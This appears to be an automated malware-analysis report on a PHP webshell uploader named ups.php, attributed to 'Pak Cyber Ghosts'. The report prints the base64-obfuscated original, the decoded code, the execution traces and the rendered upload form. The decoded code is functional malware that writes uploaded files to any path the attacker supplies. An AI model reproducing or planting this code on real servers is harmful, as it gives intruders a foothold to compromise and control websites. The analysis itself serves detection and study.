PHP Malware Analysis
ups.php
md5: 8cbaa6039638fcb881895de052128917
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Execution
Files
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
Title
- File Uploader by An0n 3xPloiTeR (Deobfuscated, HTML)
URLs
- https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
$Uploader = "ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPkZpbGUgVXBsb2FkZXIgYnkgQW4wbiAzeFBsb2lUZVI8L3RpdGxlPgo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly8xLmJwLmJsb2dzcG90LmNvbS8tbkEta2FvLXJlUEkvVjhoV01uX2dzV0kvQUFBQUFBQUFERlEvY1NBSXJyMWxnb0lHZlAzLUlrT1NhUmo4SE9pOEhMS0l3Q1BjQi9zMTYwMC8xNDE3MjAyMl8xMjc0MDE4Mzc3MTIzNzhfMTA3NjkyNDUyNF9uLmpwZyI+PC9oZWFkPjxib2R5Pgo8c3R5bGU+CmJvZHl7CmZvbnQtZmFtaWx5OiAiUmFjaW5nIFNhbnMgT25lIiwgY3Vyc2l2ZTsKYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKdGV4dC1zaGFkb3c6MHB4IDBweCAxcHggIzc1NzU3NTsKfQojY29udGVudCB0cjpob3ZlcnsKYmFja2dyb3VuZC1jb2xvcjogIzYzNjI2MzsKdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7Cn0KI2NvbnRlbnQgLmZpcnN0OmhvdmVyewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7CnRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CmJvcmRlcjogMXB4ICMwMDAwMDAgZG90dGVkOwp9Ckgxewpmb250LWZhbWlseTogIlJ5ZSIsIGN1cnNpdmU7Cn0KYXsKY29sb3I6Ymx1ZTsKdGV4dC1kZWNvcmF0aW9uOiBub25lOwp9CmE6aG92ZXJ7CmNvbG9yOiAjY2QwMGZmOwp0ZXh0LXNoYWRvdzowcHggMHB4IDEwcHggI2ZmZmZmZjsKfQppbnB1dCxzZWxlY3QsdGV4dGFyZWF7CmJvcmRlcjogMXB4ICMwMDAwMDAgc29saWQ7Ci1tb3otYm9yZGVyLXJhZGl1czogNXB4Owotd2Via2l0LWJvcmRlci1yYWRpdXM6NXB4Owpib3JkZXItcmFkaXVzOjVweDsKfQo8L3N0eWxlPgo8L0hFQUQ+CjxCT0RZPgo8SDE+PGNlbnRlcj48Zm9udCBjb2xvcj0icmVkIj5+fn48L2ZvbnQ+Q29kZWQgYnkgPGZvbnQgY29sb3I9InJlZCI+QTwvZm9udD5uMG4gM3g8Zm9udCBjb2xvcj0icmVkIj5QbG9pPC9mb250PlRlUjxmb250IGNvbG9yPSJyZWQiPn5+fjwvZm9udD4KPGJyPjxmb250IGNvbG9yPSJibHVlIj5+fn5QYWsgPGZvbnQgY29sb3I9InJlZCI+Q3liZXI8L2ZvbnQ+IEdob3N0c35+fjwvZm9udD4KIDwvY2VudGVyPjwvSDE+CjxjZW50ZXI+Cjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj4KICAgIDxpbnB1dCB0eXBlPXRleHQgbmFtZT1wYXRoPgoJPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVzIj4KCTxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVXBsb2FkIj4KPC9mb3JtPjwvYm9keT48L2NlbnRlcj48L2h0bWw+JzsKJGZpbGVzID0gQCRfRklMRVNbImZpbGVzIl07CmlmICgkZmlsZXNbIm5hbWUiXSAhPSAnJykgewogICAgJGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0gLiAkZmlsZXNbIm5hbWUiXTsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzWyd0bXBfbmFtZSddLCAkZnVsbHBhdGgpKSB7CiAgICAgICAgZWNobyAiPGNlbnRlcj48aDI+PGEgaHJlZj0nJGZ1bGxwYXRoJyB0YXJnZXQ9J19ibGFuayc+Q2xpY2sgdG8gYWNjZXNzIHVwbG9hZGVkIEZpbGU8L2E+PC9oMj48L2NlbnRlcj4iOwogICAgfQp9";
eval /* PHPDeobfuscator eval output */ {
echo "<html><head><title>File Uploader by An0n 3xPloiTeR</title>\n<link rel=\"icon\" type=\"image/png\" href=\"https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg\"></head><body>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor:blue;\ntext-decoration: none;\n}\na:hover{\ncolor: #cd00ff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center><font color=\"red\">~~~</font>Coded by <font color=\"red\">A</font>n0n 3x<font color=\"red\">Ploi</font>TeR<font color=\"red\">~~~</font>\n<br><font color=\"blue\">~~~Pak <font color=\"red\">Cyber</font> Ghosts~~~</font>\n </center></H1>\n<center>\n<form method=POST enctype=\"multipart/form-data\" action=\"\">\n <input type=text name=path>\n\t<input type=\"file\" name=\"files\">\n\t<input type=submit value=\"Upload\">\n</form></body></center></html>";
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<center><h2><a href='{$fullpath}' target='_blank'>Click to access uploaded File</a></h2></center>";
}
}
};
?> Execution traces
data/traces/8cbaa6039638fcb881895de052128917_trace-1676238675.8583.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:51:41.756091]
1 0 1 0.000139 393512
1 3 0 0.000199 396096 {main} 1 /var/www/html/uploads/ups.php 0 0
1 A /var/www/html/uploads/ups.php 2 $Uploader = 'ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPkZpbGUgVXBsb2FkZXIgYnkgQW4wbiAzeFBsb2lUZVI8L3RpdGxlPgo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly8xLmJwLmJsb2dzcG90LmNvbS8tbkEta2FvLXJlUEkvVjhoV01uX2dzV0kvQUFBQUFBQUFERlEvY1NBSXJyMWxnb0lHZlAzLUlrT1NhUmo4SE9pOEhMS0l3Q1BjQi9zMTYwMC8xNDE3MjAyMl8xMjc0MDE4Mzc3MTIzNzhfMTA3NjkyNDUyNF9uLmpwZyI+PC9oZWFkPjxib2R5Pgo8c3R5bGU+CmJvZHl7CmZvbnQtZmFtaWx5OiAiUmFjaW5nIFNhbnMgT25lIiwgY3Vyc2l2ZTsKYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKdGV4dC1zaGFkb3c6MHB4IDBweCAxcHggIzc1NzU3NTsK'
2 4 0 0.000246 396096 base64_decode 0 /var/www/html/uploads/ups.php 2 1 'ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPkZpbGUgVXBsb2FkZXIgYnkgQW4wbiAzeFBsb2lUZVI8L3RpdGxlPgo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly8xLmJwLmJsb2dzcG90LmNvbS8tbkEta2FvLXJlUEkvVjhoV01uX2dzV0kvQUFBQUFBQUFERlEvY1NBSXJyMWxnb0lHZlAzLUlrT1NhUmo4SE9pOEhMS0l3Q1BjQi9zMTYwMC8xNDE3MjAyMl8xMjc0MDE4Mzc3MTIzNzhfMTA3NjkyNDUyNF9uLmpwZyI+PC9oZWFkPjxib2R5Pgo8c3R5bGU+CmJvZHl7CmZvbnQtZmFtaWx5OiAiUmFjaW5nIFNhbnMgT25lIiwgY3Vyc2l2ZTsKYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKdGV4dC1zaGFkb3c6MHB4IDBweCAxcHggIzc1NzU3NTsK'
2 4 1 0.000279 398688
2 4 R 'echo \'<html><head><title>File Uploader by An0n 3xPloiTeR</title>\n<link rel="icon" type="image/png" href="https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg"></head><body>\n<style>\nbody{\nfont-family: "Racing Sans One", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color'
2 5 0 0.000338 402352 eval 1 'echo \'<html><head><title>File Uploader by An0n 3xPloiTeR</title>\n<link rel="icon" type="image/png" href="https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg"></head><body>\n<style>\nbody{\nfont-family: "Racing Sans One", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: "Rye", cursive;\n}\na{\ncolor:blue;\ntext-decoration: none;\n}\na:hover{\ncolor: #cd00ff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center><font color="red">~~~</font>Coded by <font color="red">A</font>n0n 3x<font color="red">Ploi</font>TeR<font color="red">~~~</font>\n<br><font color="blue">~~~Pak <font color="red">Cyber</font> Ghosts~~~</font>\n </center></H1>\n<center>\n<form method=POST enctype="multipart/form-data" action="">\n <input type=text name=path>\n\t<input type="file" name="files">\n\t<input type=submit value="Upload">\n</form></body></center></html>\';\n$files = @$_FILES["files"];\nif ($files["name"] != \'\') {\n $fullpath = $_REQUEST["path"] . $files["name"];\n if (move_uploaded_file($files[\'tmp_name\'], $fullpath)) {\n echo "<center><h2><a href=\'$fullpath\' target=\'_blank\'>Click to access uploaded File</a></h2></center>";\n }\n}' /var/www/html/uploads/ups.php 2 0
2 A /var/www/html/uploads/ups.php(2) : eval()'d code 52 $files = NULL
2 5 1 0.000412 402352
1 3 1 0.000420 398512
0.000446 318648
TRACE END [2023-02-12 19:51:41.756426]
Generated HTML code
<html><head><title>File Uploader by An0n 3xPloiTeR</title>
<link rel="icon" type="image/png" href="https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg"></head><body>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color:blue;
text-decoration: none;
}
a:hover{
color: #cd00ff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<h1><center><font color="red">~~~</font>Coded by <font color="red">A</font>n0n 3x<font color="red">Ploi</font>TeR<font color="red">~~~</font>
<br><font color="blue">~~~Pak <font color="red">Cyber</font> Ghosts~~~</font>
</center></h1>
<center>
<form method="POST" enctype="multipart/form-data" action="">
<input type="text" name="path">
<input type="file" name="files">
<input type="submit" value="Upload">
</form></center> </body></html>Original PHP code
<?php
$Uploader = "ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPkZpbGUgVXBsb2FkZXIgYnkgQW4wbiAzeFBsb2lUZVI8L3RpdGxlPgo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly8xLmJwLmJsb2dzcG90LmNvbS8tbkEta2FvLXJlUEkvVjhoV01uX2dzV0kvQUFBQUFBQUFERlEvY1NBSXJyMWxnb0lHZlAzLUlrT1NhUmo4SE9pOEhMS0l3Q1BjQi9zMTYwMC8xNDE3MjAyMl8xMjc0MDE4Mzc3MTIzNzhfMTA3NjkyNDUyNF9uLmpwZyI+PC9oZWFkPjxib2R5Pgo8c3R5bGU+CmJvZHl7CmZvbnQtZmFtaWx5OiAiUmFjaW5nIFNhbnMgT25lIiwgY3Vyc2l2ZTsKYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKdGV4dC1zaGFkb3c6MHB4IDBweCAxcHggIzc1NzU3NTsKfQojY29udGVudCB0cjpob3ZlcnsKYmFja2dyb3VuZC1jb2xvcjogIzYzNjI2MzsKdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7Cn0KI2NvbnRlbnQgLmZpcnN0OmhvdmVyewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7CnRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CmJvcmRlcjogMXB4ICMwMDAwMDAgZG90dGVkOwp9Ckgxewpmb250LWZhbWlseTogIlJ5ZSIsIGN1cnNpdmU7Cn0KYXsKY29sb3I6Ymx1ZTsKdGV4dC1kZWNvcmF0aW9uOiBub25lOwp9CmE6aG92ZXJ7CmNvbG9yOiAjY2QwMGZmOwp0ZXh0LXNoYWRvdzowcHggMHB4IDEwcHggI2ZmZmZmZjsKfQppbnB1dCxzZWxlY3QsdGV4dGFyZWF7CmJvcmRlcjogMXB4ICMwMDAwMDAgc29saWQ7Ci1tb3otYm9yZGVyLXJhZGl1czogNXB4Owotd2Via2l0LWJvcmRlci1yYWRpdXM6NXB4Owpib3JkZXItcmFkaXVzOjVweDsKfQo8L3N0eWxlPgo8L0hFQUQ+CjxCT0RZPgo8SDE+PGNlbnRlcj48Zm9udCBjb2xvcj0icmVkIj5+fn48L2ZvbnQ+Q29kZWQgYnkgPGZvbnQgY29sb3I9InJlZCI+QTwvZm9udD5uMG4gM3g8Zm9udCBjb2xvcj0icmVkIj5QbG9pPC9mb250PlRlUjxmb250IGNvbG9yPSJyZWQiPn5+fjwvZm9udD4KPGJyPjxmb250IGNvbG9yPSJibHVlIj5+fn5QYWsgPGZvbnQgY29sb3I9InJlZCI+Q3liZXI8L2ZvbnQ+IEdob3N0c35+fjwvZm9udD4KIDwvY2VudGVyPjwvSDE+CjxjZW50ZXI+Cjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj4KICAgIDxpbnB1dCB0eXBlPXRleHQgbmFtZT1wYXRoPgoJPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVzIj4KCTxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVXBsb2FkIj4KPC9mb3JtPjwvYm9keT48L2NlbnRlcj48L2h0bWw+JzsKJGZpbGVzID0gQCRfRklMRVNbImZpbGVzIl07CmlmICgkZmlsZXNbIm5hbWUiXSAhPSAnJykgewogICAgJGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0gLiAkZmlsZXNbIm5hbWUiXTsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzWyd0bXBfbmFtZSddLCAkZnVsbHBhdGgpKSB7CiAgICAgICAgZWNobyAiPGNlbnRlcj48aDI+PGEgaHJlZj0nJGZ1bGxwYXRoJyB0YXJnZXQ9J19ibGFuayc+Q2xpY2sgdG8gYWNjZXNzIHVwbG9hZGVkIEZpbGU8L2E+PC9oMj48L2NlbnRlcj4iOwogICAgfQp9"; eval(base64_decode($Uploader));
?>